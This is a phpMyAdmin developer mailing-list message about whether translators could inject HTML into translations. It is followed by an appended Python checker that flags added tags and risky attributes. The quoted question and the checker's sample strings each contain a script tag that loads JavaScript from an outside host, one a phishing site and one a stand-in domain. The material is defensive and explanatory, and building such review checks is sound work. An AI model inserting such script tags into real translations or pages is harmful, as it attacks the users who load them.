[Phpmyadmin-devel] What are the chances that irrelevant translations would go unnoticed?

Michal Čihař michal at cihar.com
Wed Jul 2 13:11:57 CEST 2014


Hi

On Wed, 2 Jul 2014 16:02:23 +0530
Chirayu Chiripal <chirayu.chiripal at gmail.com> wrote:

> I have seen a few translations using HTML tags in them. I was shocked
> that HTML tags are allowed in translations.
> Isn't it possible that someone can insert tags like this
> <script src="http://www.some-phishing-site.com/simple.js"></script>
> with the translation, which can then be used to attack users of a
> particular language?

Technically it is possible, though markup changes are something I always
check (Weblate has a flag for this, so it's quite easy to review), so that
will not get in. Indeed it would be better to always use just bbcode and
pass all strings through PMA_sanitize(), but that means somebody would
have to go through the code and fix the messages :-).

PS: I hope you don't mind bringing this back to -devel list.

-- 
	Michal Čihař | http://cihar.com | http://blog.cihar.com
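
Added example, not part of the original message and not Weblate's or phpMyAdmin's own code: a small review check in the spirit of the markup-change flag mentioned above, reporting any translation whose HTML tags or link/script attributes differ from the source string. The function names and the sample strings are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Matches an opening or closing HTML tag; captures "/", the tag name, the attribute text.
TAG_RE = re.compile(r"<\s*(/?)\s*([a-zA-Z][a-zA-Z0-9]*)([^>]*)>")
# Attributes that can load or run content; their values must match the source string.
RISKY_ATTR_RE = re.compile(
    r"""\b(href|src|action|on\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)

def markup_signature(text):
    """Multiset of (is_closing, tag name, risky attributes) for every tag in text."""
    sig = Counter()
    for closing, name, attrs in TAG_RE.findall(text):
        risky = tuple(sorted((k.lower(), v.strip("\"'"))
                             for k, v in RISKY_ATTR_RE.findall(attrs)))
        sig[(bool(closing), name.lower(), risky)] += 1
    return sig

def review_translation(source, translation):
    """Markup present in only one of the two strings; an empty list means unchanged."""
    src, dst = markup_signature(source), markup_signature(translation)
    findings = []
    for item in sorted((dst - src).keys(), key=repr):
        findings.append(("added", item[1], item[2]))
    for item in sorted((src - dst).keys(), key=repr):
        findings.append(("removed", item[1], item[2]))
    return findings

# Constructed (msgid, msgstr) pairs; not taken from the phpMyAdmin catalogue.
SAMPLES = [
    ('Click <a href="./doc.html">here</a> for help.',
     'Klikněte <a href="./doc.html">zde</a> pro nápovědu.'),
    ('Click <a href="./doc.html">here</a> for help.',
     'Klikněte <a href="http://translator.example/doc.html">zde</a>.'),
    ('Query <b>failed</b>.',
     'Dotaz <b>selhal</b>.<script src="http://translator.example/x.js"></script>'),
]

if __name__ == "__main__":
    for msgid, msgstr in SAMPLES:
        print(review_translation(msgid, msgstr) or "markup unchanged")
```

A check like this only narrows what a reviewer has to read; strings that reach the page unescaped still depend on output sanitising, as the message says.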